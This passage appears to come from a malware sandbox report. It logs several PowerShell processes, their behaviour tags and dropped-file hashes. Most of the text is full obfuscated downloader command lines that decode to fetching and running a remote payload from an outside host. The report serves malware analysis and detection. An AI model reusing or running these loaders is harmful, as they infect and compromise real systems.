;$Verged=$Slithery[$Solkremer];}$Agersenneppen=326866;$Disyllabic=29427;Patarine (Resborgerne ' n$EmgL.LS,OReBP,AVoL.r: eBInK BK CE NDub ouSmnDoDMyE tNPaeAc St=T BnGM eXpTUn-CocHjoO NStTOrE ,nReTTo Si$ .s oP,lS,e WN i ');Patarine (Resborgerne ' e$ SgislcaoP b raKulCa: nWUniArnThgUdsS.pLeaOpnRu d.= M a[,lSPaySes atUreTam .LeCuhoAnnKov aeF rOut ].o:Bi:InFTerR oRem FB Sa as Re n6Hj4MaSR tAarReiGlnU gEx(T.$FoB .kHykBoe vn SbPhuWenKvdR,e n VePr) o ');Patarine (Resborgerne ' t$V GPhL TOK b .aFiLU.:InFS ipaS rk jeHuK Suslt atT.EJer SeTisSv Ca=El r[ .sReYF,SsaT EBuMSa.Mitr EreXnatMe.InePiNskCKao .D TI fn LgOu]Ca:Be:GiaMysTeC iI mIOp.veGUnE nTPosSgtMurBriPenHegCe(Ge$ wF,I QN SGEmS TpInA FnEj)bu ');Patarine (Resborgerne 'Me$s.GEjL O TbO.aHoLBo: Cs fKEkIWilJolLiIFrNdug,eSS vSpi NsFuEassTe=,r$FyF viP.SS,kO EKskToU mT cT einrIsEptSFi. FsBuU abBaSFoT rJuI BNHaG s(Tr$ uaFiG dek RR.sNeEDunOuN ueOvpLip.ne .NV , $PadIdI VSKoYLrLSjl FAMaB ei CLe) l ');Patarine $Skillingsvises;"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3832
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Surtouts Metalkiste Folium #>;$Opholdte231='Zenography';<#Anstand Misvouched Modelled Otmar Riffelgang #>;$Tilvristes=$Scrimshanker23+$host.UI;If ($Tilvristes) {$Rommy212++;}function Nonreceptively($lndstatistikkens){$Forringelsens212=$Tommestokkene+$lndstatistikkens.Length-$Rommy212; for( $Hjaelpefunktion242=2;$Hjaelpefunktion242 -lt $Forringelsens212;$Hjaelpefunktion242+=3){$Kller='Murmuringly222';$Partshringen+=$lndstatistikkens[$Hjaelpefunktion242];$pisachi='Turnering';}$Partshringen;}function Sekundovioliners162($Cardionosus){ . ($Prevented) ($Cardionosus);}$Nonscrutiny=Nonreceptively ' BMGro zSui .ltelVras /Co5Da.Fr0My .r( SWAsiOvn AdVaoSyw sCa kNDeT S 1Un0 . ,0 r;pa edWBaiB nCh6.o4Be;O .ex D6R 4De;R GrrB v v: F1 P2G 1Th. P0Li)Kl FoGObe.ic.akDeoS./ha2Ln0E 1 F0Su0 e1Nr0Un1 TrFBei lr SeInfScoLux.u/St1Ed2St1Tr.Ne0Ka ';$Afretters=Nonreceptively ' uUAms SeFirSh- Ta tGGre RN TUl ';$Noration252=Nonreceptively 'Smh KtBrtT pKosPr:No/Sa/ cw Rw hwE .RefIna HsK,thoa Fn sk EaU uMifC . IdHue /MoG Da pjSa.Dil,upP.k B ';$Densitometre=Nonreceptively 'Fa> R ';$Prevented=Nonreceptively 'leIEkEDexCr ';$Krigssituationens='Mngderabats';$Cadillo='\Alkyds.jen';Sekundovioliners162 (Nonreceptively 'Sl$ G .lIdO.nbMiAF,LSt:,ybskLTea ,rUni ,nAfaSe= o$ aeCen ,vLi:T a FpP P ud aChtGuASt+So$ hcPea.ads.i ilB LReO.i ');Sekundovioliners162 (Nonreceptively 'L $BeGTilBioMaBC,a LS.:.eAEvUSlt,uoOnPPahProF,TPro TMNaE CtUnR pySa=Op$ Pn .omarNyAAstapi aobonMa2K,5St2A..udSUnp ,L MIVat n(Ta$ BdFreeunfjsPri.etH,OJamH.EentUdRH ede) E ');Sekundovioliners162 (Nonreceptively 'Cy[RenR,EP,tTi. es TeInRFovPaIP c tE DPSto uISlnIdTYeMG a nN AShg e lRLa]op:Br: sBuE DCUnuR r iInTSeYefPRurBoOStTBeOggCUrOt l . =Do Et[Fen ReSat ,.FisAlE nCHeuSkrGaiCiT Ybup rNgo,jTFrOEkc hO aL tb y pN.ePr]Fl:an: iTReLe S C1Gu2Fr ');$Noration252=$autophotometry[0];$Terebrate=(Nonreceptively ' K$TeGFolK.o,lB .a,eLDe:PrFEnu hN.iA PM DBTeUSvL SAN TLaIC NRoG B=ViNhyEFlW a-faoFib .jbrEGuc TAr S s aYAsS,ntC,EInm T.BaNFlEBit.t.StWPoe AbkuC bL TiCieD NKotDe ');Sekundovioliners162 ($Terebrate);Sekundovioliners162 (Nonreceptively ' U$ lF Su mnToaOumBobGruMul KaPrtmoiRen CgEv.T HBle aArdIce Vr.ms O[ M$P,A IfT.r neCatIntE,eF.r,rs,n]Re=Sy$BeNFooP nTvs icdrrGauFot SiSonH yPr ');$Craniopuncture=Nonreceptively 'sk$ nF MuR nN,a tmMebAfu SlCoaUdtVei nUsgBr. MDChoT w,enSal oo yanudTrFPri VlO.eU.( ,$ ENBooCorUna,otA,iOvo WnFo2B 5S 2C,, $,kP ohFeoOpn yeUnmSueF sSt)G. ';$Phonemes=$Blarina;Sekundovioliners162 (Nonreceptively ' u$,nGOvLFoO bTiA AL H:Raf dRBaiC MR,RS KHoeSkH a TnSmD aLdaEWarO nAcE s .2 a4 A3Ha=,e(,oTa eBlSS,TEx- Pp CAMutSoh.i Re$ CpGuH CoOdNBoE umSyEOus )Md ');while (!$Frimrkehandlernes243) {Sekundovioliners162 (Nonreceptively ' i$FigSklBaoOub,raSylEd: .U dKadPreG lCei HgB,e Rs.e=.i$P tV r LuKue H ') ;Sekundovioliners162 $Craniopuncture;Sekundovioliners162 (Nonreceptively ' s MtUnABoRDeTT.-haSn,L ,e EOvPSi Re4Ni ');Sekundovioliners162 (Nonreceptively 'ex$JuGcaLStO AbDiaC,lgr:M F,irs I PMQ,RB KBeEK h AFonSkd ,Lpre mRTrN iEF.sCo2Ru4We3A = P(FrT eBaS Ct C- rp .A TQuH S Mi$E PSnhS OCrn,ae dMSieDesCh) ') ;Sekundovioliners162 (Nonreceptively 'C,$AuGArlr o SBPra,elRu:UnIRoNSitFoeSaRTeb .RAie taStT FhD =Ha$CoGTulBoONabFoA.llGa: d Se.onDaa eT uLir aETrr iJuN TG uSInMBlIPsdC LF EAnt SI,+Un+ P%S.$GoaRauUfTMuoSlpMehNaO iTCoO Rm .ESntQurD y e. Dc eoAiu oN.aTD. ') ;$Noration252=$autophotometry[$Interbreath];}$Superieure=333021;$Unmeet=29044;Sekundovioliners162 (Nonreceptively 'Ma$DeGEfl pO rb.rA lu.: GYtaChrFoD oEKoRF.KMoafaSN EWrRI,n GE .R P Af= L FlG lEimTUn-KrCWaoClNEnTM e iNBat.u Im$P pOph o .nAlEOvm NeDos,f ');Sekundovioliners162 (Nonreceptively 'P $S,gMal.voglbs.asulAn:H BS uFonAndBeb .r It Ps.n Or= O G.[ rS AyhesDrtPye,omV,.S,C Eo JnDev IeA rDitSa] a:Wa:whFCurCyoMamBlBWaa KsAueKl6 ,4 lS it Gr i GnmegTv(,t$D GAna Tr.mdCaeS rGlkTiaAfs ueCorBun.oe.arC.)be ');Sekundovioliners162 (Nonreceptively 'Ch$SuGT LCaOExB .aUdlDa:IwY dUdeHurDel I.og gRea AGie anHed.eEBlS.e =So Da[KvsLoYG sKitUnEC mSt.PatpiEc,x iTS .jue,eNmactjOMoDKoiOun cGd ]En:P.:xaATosHec eIK,iRe. DG ,eHat .S et BrH,iS.NAkgCh(U $PoBTuuL nF df BGirNaTIlsSi)Bi ');Sekundovioliners162 (Nonreceptively 'Si$ SgFelM.O iBOmaTalP :Idm,ea,uGBinLuISpSN.7.i4An=Ov$Joy d.neanR eL rIHogn gOua oAEfE,inl dp.E FS .GosCou SBMoSEnTUdr iCon.igRe(Fa$Dos SUI pS.E,ar SiBoEVeuAnrH e e,L,$ UKinUnM eeFreA T B) . ');Sekundovioliners162 $Magnis74;"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4764
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Oui Kroniske Relaster #>;$Tykkammenes='Boraciferous';<#Mnstergyldigt Obtruded Preinserts Cabbies Forktringers #>;$Aeroduct=$Opkbenes+$host.UI;If ($Aeroduct) {$Aktieindsigtens++;}function Resborgerne($Rica){$Rendyrker=$Tensibly88+$Rica.Length-$Aktieindsigtens; for( $Wame=2;$Wame -lt $Rendyrker;$Wame+=3){$Snketunnel='Scog';$Disjune+=$Rica[$Wame];$Yenning='Amtsborgmesterens';}$Disjune;}function Patarine($Defoggers){ & ($Midstroke) ($Defoggers);}$Quinamidin=Resborgerne 'G.MLeo zFoiSpl l NaSm/Sk5Re.Ha0.l Mi(JoW i enT,dGuoM,w es y CeN hTM ,1Ta0Un. H0Ps;O hW iAsnB 6Tz4Mu; O AfxPy6Ge4 ;.o ParB,vAf:Ex1Tu2 S1Li.Gi0mi)d. S G Ke,mcRakC oS,/ S2 P0 1 0D.0Li1 o0pi1 r JoFPliK rO,escfSuoWixG /ti1Ku2U 1P . .0bi ';$Eukalyptussen=Resborgerne 'Nou.lsunESaRTe-,hat garE aNPat B ';$Verged=Resborgerne 'TrhTytSatkjp Askn: i/Ca/ FwfowMawBl.TufF ahesPotL.aEfnDik oaTouT,f . VdE eSv/ChUPorCleA t Pf r dTuiAlg,hh,ne.kdQueO,n M.S adacSaaT ';$Manettes=Resborgerne ' s>Ni ';$Midstroke=Resborgerne 'b itrEG xO ';$Redispersed='Umulige';$Kilowatttimer='\Redbuds.Dip';Patarine (Resborgerne 'Ma$SkGDrlB oSebdia lS.:I,c,dlC.Y SFlT.gES RHa1Mu2F,3Kl=Sp$ .e Jn,avTe: PA OpR,P.hdstaPeTs AHe+ M$ TkU iP,LAkOS wOpa oTF,TCoT ,IJoM ,eSkrW ');Patarine (Resborgerne 'Sl$TygKoLKoO Pb oa LFo:BuS BLU,iO tteH Oe RrP y =Mi$DrV nE .R CGL,eSlD a. NSSlPheLS,I,ttPo( e$GamI AUnnEpe EtteT OEO.s a)La ');Patarine (Resborgerne 'Tr[PoN.reP TSt.S S,rECaR SvNoiLaCIneEppStoMoIGaNAmT Tm Ca FNAgA TgRee rPr] E:Va: USTrEKocNauJor DiAft y Vp SrIno yTLioHjCA.o KLKo Su= D Pa[ en,aegotMo. SBiE ScBru orSyI iT uYasp,or o.nT loBaC O RLAlT fyBapPreSh]Ch:B :OrT FlS s 1Vh2Ly ');$Verged=$Slithery[0];$Skjolddragers=(Resborgerne 'Mi$ UgMlLFlOl BF aD Lcr:FlPLeh BeTanHaaYac,ieKatEdiDun ie,y= .nToEArWFr-R.o bN jAmeR CemTTr FjsRuYQuS ktDeEKomPh.TinL.e FTGu.HaW DeSvbOvc vlAliNieO NAbTRa ');Patarine ($Skjolddragers);Patarine (Resborgerne 'No$TePRhh .eBan iaZicD e et iNan.beRe.,nHFee Ma Adane.or os C[e $DiERau lk BaU,lStySupNotHou.os isB eSenFr] n=As$AcQReuOmiinn Aal m .iRadtiiLinNo ');$Tampen=Resborgerne 'Fo$B PTeh,geRen Ea bcbie tLeiFin Fe r.UnDAfoMiwStn Ul noApaSkd CFh.i Sl OeUd(Fy$ CVm eB rCag,ceTrd,q,gr$.lSPaoBalTee nsu),r ';$Solen=$Clyster123;Patarine (Resborgerne 'C $KogSkLHeoReb .A ,LT.: URAwaAnAUndUnGUnI.ev ,nExIfiN gRaE enM sF =Ca(S TBaEOvs DtCo-PrP pa itFuhKi De$VuS.uoB L,oe kN .) o ');while (!$Raadgivningens) {Patarine (Resborgerne ' $ZugTrl Oo Fb oaCil p:KfRPhdPon,ri nSugReeTrnse=Hj$EmtHur AuR eOp ') ;Patarine $Tampen;Patarine (Resborgerne 'BlSSeT oA rRUnTV - Rs lSoeheEPaP A Fn4sw ');Patarine (Resborgerne 'Mu$S gTrlAlO,tB Sa FL t: AR ua KaV D GStiCaVAdn EIInn CG OEMaN ES n=Sa(FoT sEPasWitM - DpSpa tNehSt J $Unsa osllB EHanPo)M ') ;Patarine (Resborgerne 'Ja$ egMeLsyo Db A il t:FosInoFiLUdkF.rOdegimB eC RAr=S,$KlGFlLPioSyB oANelTi: VSN o VMInn DoB,lSlEopSPeCKae EN rTFl+ U+ a%fo$ os L yIstTPoHFeEAsr .yIm.SkcBoo huCrn STCo ') ;$Verged=$Slithery[$Solkremer];}$Agersenneppen=326866;$Disyllabic=29427;Patarine (Resborgerne ' n$EmgL.LS,OReBP,AVoL.r: eBInK BK CE NDub ouSmnDoDMyE tNPaeAc St=T BnGM eXpTUn-CocHjoO NStTOrE ,nReTTo Si$ .s oP,lS,e WN i ');Patarine (Resborgerne ' e$ SgislcaoP b raKulCa: nWUniArnThgUdsS.pLeaOpnRu d.= M a[,lSPaySes atUreTam .LeCuhoAnnKov aeF rOut ].o:Bi:InFTerR oRem FB Sa as Re n6Hj4MaSR tAarReiGlnU gEx(T.$FoB .kHykBoe vn SbPhuWenKvdR,e n VePr) o ');Patarine (Resborgerne ' t$V GPhL TOK b .aFiLU.:InFS ipaS rk jeHuK Suslt atT.EJer SeTisSv Ca=El r[ .sReYF,SsaT EBuMSa.Mitr EreXnatMe.InePiNskCKao .D TI fn LgOu]Ca:Be:GiaMysTeC iI mIOp.veGUnE nTPosSgtMurBriPenHegCe(Ge$ wF,I QN SGEmS TpInA FnEj)bu ');Patarine (Resborgerne 'Me$s.GEjL O TbO.aHoLBo: Cs fKEkIWilJolLiIFrNdug,eSS vSpi NsFuEassTe=,r$FyF viP.SS,kO EKskToU mT cT einrIsEptSFi. FsBuU abBaSFoT rJuI BNHaG s(Tr$ uaFiG dek RR.sNeEDunOuN ueOvpLip.ne .NV , $PadIdI VSKoYLrLSjl FAMaB ei CLe) l ');Patarine $Skillingsvises;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4672
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Surtouts Metalkiste Folium #>;$Opholdte231='Zenography';<#Anstand Misvouched Modelled Otmar Riffelgang #>;$Tilvristes=$Scrimshanker23+$host.UI;If ($Tilvristes) {$Rommy212++;}function Nonreceptively($lndstatistikkens){$Forringelsens212=$Tommestokkene+$lndstatistikkens.Length-$Rommy212; for( $Hjaelpefunktion242=2;$Hjaelpefunktion242 -lt $Forringelsens212;$Hjaelpefunktion242+=3){$Kller='Murmuringly222';$Partshringen+=$lndstatistikkens[$Hjaelpefunktion242];$pisachi='Turnering';}$Partshringen;}function Sekundovioliners162($Cardionosus){ . ($Prevented) ($Cardionosus);}$Nonscrutiny=Nonreceptively ' BMGro zSui .ltelVras /Co5Da.Fr0My .r( SWAsiOvn AdVaoSyw sCa kNDeT S 1Un0 . ,0 r;pa edWBaiB nCh6.o4Be;O .ex D6R 4De;R GrrB v v: F1 P2G 1Th. P0Li)Kl FoGObe.ic.akDeoS./ha2Ln0E 1 F0Su0 e1Nr0Un1 TrFBei lr SeInfScoLux.u/St1Ed2St1Tr.Ne0Ka ';$Afretters=Nonreceptively ' uUAms SeFirSh- Ta tGGre RN TUl ';$Noration252=Nonreceptively 'Smh KtBrtT pKosPr:No/Sa/ cw Rw hwE .RefIna HsK,thoa Fn sk EaU uMifC . IdHue /MoG Da pjSa.Dil,upP.k B ';$Densitometre=Nonreceptively 'Fa> R ';$Prevented=Nonreceptively 'leIEkEDexCr ';$Krigssituationens='Mngderabats';$Cadillo='\Alkyds.jen';Sekundovioliners162 (Nonreceptively 'Sl$ G .lIdO.nbMiAF,LSt:,ybskLTea ,rUni ,nAfaSe= o$ aeCen ,vLi:T a FpP P ud aChtGuASt+So$ hcPea.ads.i ilB LReO.i ');Sekundovioliners162 (Nonreceptively 'L $BeGTilBioMaBC,a LS.:.eAEvUSlt,uoOnPPahProF,TPro TMNaE CtUnR pySa=Op$ Pn .omarNyAAstapi aobonMa2K,5St2A..udSUnp ,L MIVat n(Ta$ BdFreeunfjsPri.etH,OJamH.EentUdRH ede) E ');Sekundovioliners162 (Nonreceptively 'Cy[RenR,EP,tTi. es TeInRFovPaIP c tE DPSto uISlnIdTYeMG a nN AShg e lRLa]op:Br: sBuE DCUnuR r iInTSeYefPRurBoOStTBeOggCUrOt l . =Do Et[Fen ReSat ,.FisAlE nCHeuSkrGaiCiT Ybup rNgo,jTFrOEkc hO aL tb y pN.ePr]Fl:an: iTReLe S C1Gu2Fr ');$Noration252=$autophotometry[0];$Terebrate=(Nonreceptively ' K$TeGFolK.o,lB .a,eLDe:PrFEnu hN.iA PM DBTeUSvL SAN TLaIC NRoG B=ViNhyEFlW a-faoFib .jbrEGuc TAr S s aYAsS,ntC,EInm T.BaNFlEBit.t.StWPoe AbkuC bL TiCieD NKotDe ');Sekundovioliners162 ($Terebrate);Sekundovioliners162 (Nonreceptively ' U$ lF Su mnToaOumBobGruMul KaPrtmoiRen CgEv.T HBle aArdIce Vr.ms O[ M$P,A IfT.r neCatIntE,eF.r,rs,n]Re=Sy$BeNFooP nTvs icdrrGauFot SiSonH yPr ');$Craniopuncture=Nonreceptively 'sk$ nF MuR nN,a tmMebAfu SlCoaUdtVei nUsgBr. MDChoT w,enSal oo yanudTrFPri VlO.eU.( ,$ ENBooCorUna,otA,iOvo WnFo2B 5S 2C,, $,kP ohFeoOpn yeUnmSueF sSt)G. ';$Phonemes=$Blarina;Sekundovioliners162 (Nonreceptively ' u$,nGOvLFoO bTiA AL H:Raf dRBaiC MR,RS KHoeSkH a TnSmD aLdaEWarO nAcE s .2 a4 A3Ha=,e(,oTa eBlSS,TEx- Pp CAMutSoh.i Re$ CpGuH CoOdNBoE umSyEOus )Md ');while (!$Frimrkehandlernes243) {Sekundovioliners162 (Nonreceptively ' i$FigSklBaoOub,raSylEd: .U dKadPreG lCei HgB,e Rs.e=.i$P tV r LuKue H ') ;Sekundovioliners162 $Craniopuncture;Sekundovioliners162 (Nonreceptively ' s MtUnABoRDeTT.-haSn,L ,e EOvPSi Re4Ni ');Sekundovioliners162 (Nonreceptively 'ex$JuGcaLStO AbDiaC,lgr:M F,irs I PMQ,RB KBeEK h AFonSkd ,Lpre mRTrN iEF.sCo2Ru4We3A = P(FrT eBaS Ct C- rp .A TQuH S Mi$E PSnhS OCrn,ae dMSieDesCh) ') ;Sekundovioliners162 (Nonreceptively 'C,$AuGArlr o SBPra,elRu:UnIRoNSitFoeSaRTeb .RAie taStT FhD =Ha$CoGTulBoONabFoA.llGa: d Se.onDaa eT uLir aETrr iJuN TG uSInMBlIPsdC LF EAnt SI,+Un+ P%S.$GoaRauUfTMuoSlpMehNaO iTCoO Rm .ESntQurD y e. Dc eoAiu oN.aTD. ') ;$Noration252=$autophotometry[$Interbreath];}$Superieure=333021;$Unmeet=29044;Sekundovioliners162 (Nonreceptively 'Ma$DeGEfl pO rb.rA lu.: GYtaChrFoD oEKoRF.KMoafaSN EWrRI,n GE .R P Af= L FlG lEimTUn-KrCWaoClNEnTM e iNBat.u Im$P pOph o .nAlEOvm NeDos,f ');Sekundovioliners162 (Nonreceptively 'P $S,gMal.voglbs.asulAn:H BS uFonAndBeb .r It Ps.n Or= O G.[ rS AyhesDrtPye,omV,.S,C Eo JnDev IeA rDitSa] a:Wa:whFCurCyoMamBlBWaa KsAueKl6 ,4 lS it Gr i GnmegTv(,t$D GAna Tr.mdCaeS rGlkTiaAfs ueCorBun.oe.arC.)be ');Sekundovioliners162 (Nonreceptively 'Ch$SuGT LCaOExB .aUdlDa:IwY dUdeHurDel I.og gRea AGie anHed.eEBlS.e =So Da[KvsLoYG sKitUnEC mSt.PatpiEc,x iTS .jue,eNmactjOMoDKoiOun cGd ]En:P.:xaATosHec eIK,iRe. DG ,eHat .S et BrH,iS.NAkgCh(U $PoBTuuL nF df BGirNaTIlsSi)Bi ');Sekundovioliners162 (Nonreceptively 'Si$ SgFelM.O iBOmaTalP :Idm,ea,uGBinLuISpSN.7.i4An=Ov$Joy d.neanR eL rIHogn gOua oAEfE,inl dp.E FS .GosCou SBMoSEnTUdr iCon.igRe(Fa$Dos SUI pS.E,ar SiBoEVeuAnrH e e,L,$ UKinUnM eeFreA T B) . ');Sekundovioliners162 $Magnis74;"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4384
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Oui Kroniske Relaster #>;$Tykkammenes='Boraciferous';<#Mnstergyldigt Obtruded Preinserts Cabbies Forktringers #>;$Aeroduct=$Opkbenes+$host.UI;If ($Aeroduct) {$Aktieindsigtens++;}function Resborgerne($Rica){$Rendyrker=$Tensibly88+$Rica.Length-$Aktieindsigtens; for( $Wame=2;$Wame -lt $Rendyrker;$Wame+=3){$Snketunnel='Scog';$Disjune+=$Rica[$Wame];$Yenning='Amtsborgmesterens';}$Disjune;}function Patarine($Defoggers){ & ($Midstroke) ($Defoggers);}$Quinamidin=Resborgerne 'G.MLeo zFoiSpl l NaSm/Sk5Re.Ha0.l Mi(JoW i enT,dGuoM,w es y CeN hTM ,1Ta0Un. H0Ps;O hW iAsnB 6Tz4Mu; O AfxPy6Ge4 ;.o ParB,vAf:Ex1Tu2 S1Li.Gi0mi)d. S G Ke,mcRakC oS,/ S2 P0 1 0D.0Li1 o0pi1 r JoFPliK rO,escfSuoWixG /ti1Ku2U 1P . .0bi ';$Eukalyptussen=Resborgerne 'Nou.lsunESaRTe-,hat garE aNPat B ';$Verged=Resborgerne 'TrhTytSatkjp Askn: i/Ca/ FwfowMawBl.TufF ahesPotL.aEfnDik oaTouT,f . VdE eSv/ChUPorCleA t Pf r dTuiAlg,hh,ne.kdQueO,n M.S adacSaaT ';$Manettes=Resborgerne ' s>Ni ';$Midstroke=Resborgerne 'b itrEG xO ';$Redispersed='Umulige';$Kilowatttimer='\Redbuds.Dip';Patarine (Resborgerne 'Ma$SkGDrlB oSebdia lS.:I,c,dlC.Y SFlT.gES RHa1Mu2F,3Kl=Sp$ .e Jn,avTe: PA OpR,P.hdstaPeTs AHe+ M$ TkU iP,LAkOS wOpa oTF,TCoT ,IJoM ,eSkrW ');Patarine (Resborgerne 'Sl$TygKoLKoO Pb oa LFo:BuS BLU,iO tteH Oe RrP y =Mi$DrV nE .R CGL,eSlD a. NSSlPheLS,I,ttPo( e$GamI AUnnEpe EtteT OEO.s a)La ');Patarine (Resborgerne 'Tr[PoN.reP TSt.S S,rECaR SvNoiLaCIneEppStoMoIGaNAmT Tm Ca FNAgA TgRee rPr] E:Va: USTrEKocNauJor DiAft y Vp SrIno yTLioHjCA.o KLKo Su= D Pa[ en,aegotMo. SBiE ScBru orSyI iT uYasp,or o.nT loBaC O RLAlT fyBapPreSh]Ch:B :OrT FlS s 1Vh2Ly ');$Verged=$Slithery[0];$Skjolddragers=(Resborgerne 'Mi$ UgMlLFlOl BF aD Lcr:FlPLeh BeTanHaaYac,ieKatEdiDun ie,y= .nToEArWFr-R.o bN jAmeR CemTTr FjsRuYQuS ktDeEKomPh.TinL.e FTGu.HaW DeSvbOvc vlAliNieO NAbTRa ');Patarine ($Skjolddragers);Patarine (Resborgerne 'No$TePRhh .eBan iaZicD e et iNan.beRe.,nHFee Ma Adane.or os C[e $DiERau lk BaU,lStySupNotHou.os isB eSenFr] n=As$AcQReuOmiinn Aal m .iRadtiiLinNo ');$Tampen=Resborgerne 'Fo$B PTeh,geRen Ea bcbie tLeiFin Fe r.UnDAfoMiwStn Ul noApaSkd CFh.i Sl OeUd(Fy$ CVm eB rCag,ceTrd,q,gr$.lSPaoBalTee nsu),r ';$Solen=$Clyster123;Patarine (Resborgerne 'C $KogSkLHeoReb .A ,LT.: URAwaAnAUndUnGUnI.ev ,nExIfiN gRaE enM sF =Ca(S TBaEOvs DtCo-PrP pa itFuhKi De$VuS.uoB L,oe kN .) o ');while (!$Raadgivningens) {Patarine (Resborgerne ' $ZugTrl Oo Fb oaCil p:KfRPhdPon,ri nSugReeTrnse=Hj$EmtHur AuR eOp ') ;Patarine $Tampen;Patarine (Resborgerne 'BlSSeT oA rRUnTV - Rs lSoeheEPaP A Fn4sw ');Patarine (Resborgerne 'Mu$S gTrlAlO,tB Sa FL t: AR ua KaV D GStiCaVAdn EIInn CG OEMaN ES n=Sa(FoT sEPasWitM - DpSpa tNehSt J $Unsa osllB EHanPo)M ') ;Patarine (Resborgerne 'Ja$ egMeLsyo Db A il t:FosInoFiLUdkF.rOdegimB eC RAr=S,$KlGFlLPioSyB oANelTi: VSN o VMInn DoB,lSlEopSPeCKae EN rTFl+ U+ a%fo$ os L yIstTPoHFeEAsr .yIm.SkcBoo huCrn STCo ') ;$Verged=$Slithery[$Solkremer];}$Agersenneppen=326866;$Disyllabic=29427;Patarine (Resborgerne ' n$EmgL.LS,OReBP,AVoL.r: eBInK BK CE NDub ouSmnDoDMyE tNPaeAc St=T BnGM eXpTUn-CocHjoO NStTOrE ,nReTTo Si$ .s oP,lS,e WN i ');Patarine (Resborgerne ' e$ SgislcaoP b raKulCa: nWUniArnThgUdsS.pLeaOpnRu d.= M a[,lSPaySes atUreTam .LeCuhoAnnKov aeF rOut ].o:Bi:InFTerR oRem FB Sa as Re n6Hj4MaSR tAarReiGlnU gEx(T.$FoB .kHykBoe vn SbPhuWenKvdR,e n VePr) o ');Patarine (Resborgerne ' t$V GPhL TOK b .aFiLU.:InFS ipaS rk jeHuK Suslt atT.EJer SeTisSv Ca=El r[ .sReYF,SsaT EBuMSa.Mitr EreXnatMe.InePiNskCKao .D TI fn LgOu]Ca:Be:GiaMysTeC iI mIOp.veGUnE nTPosSgtMurBriPenHegCe(Ge$ wF,I QN SGEmS TpInA FnEj)bu ');Patarine (Resborgerne 'Me$s.GEjL O TbO.aHoLBo: Cs fKEkIWilJolLiIFrNdug,eSS vSpi NsFuEassTe=,r$FyF viP.SS,kO EKskToU mT cT einrIsEptSFi. FsBuU abBaSFoT rJuI BNHaG s(Tr$ uaFiG dek RR.sNeEDunOuN ueOvpLip.ne .NV , $PadIdI VSKoYLrLSjl FAMaB ei CLe) l ');Patarine $Skillingsvises;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4936

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    25604a2821749d30ca35877a7669dff9

    SHA1

    49c624275363c7b6768452db6868f8100aa967be

    SHA256

    7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

    SHA512

    206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    53KB

    MD5

    d4d8cef58818612769a698c291ca3b37

    SHA1

    54e0a6e0c08723157829cea009ec4fe30bea5c50

    SHA256

    98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

    SHA512

    f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    18KB

    MD5

    488579d77b4770df875d2478893fc198

    SHA1

    f0547b67ab86fe9f4edf477f0f6e9d14e145533e

    SHA256

    9c54f7185692800d2fdc3261bcc3f0023c92b162da5c26297f3a722c3f76811d

    SHA512

    829d113b7662a4182aaa74d9bea71bb452b91284d24714b3dd2097d5c9c3e091a495daa6a9a9b50e4b6639514bfd92484b92f8791a2c147f8e540833373fe95e

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    eb53ede6a4097e2c8ca360f0550138f2

    SHA1

    3c9fd8138fdb0783020466e30faa88411ce72d12

    SHA256

    3b677694dbb1226f93f761d69aa2e7c92fd1664e685b81af1e26efc64fbdcdcc

    SHA512

    e3f05dd0b68f39197c9a3d7305156c623d52f5df6e2cea559c46a9daad888733a4e0e60600c4051687e3cce39f809b4cb4fa0d7a83bb45abe2946266288682df

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    7b729b76807ea4216b633128f80dfded

    SHA1

    0affad81c35b6870bb7a8753be50c5b28551f922

    SHA256

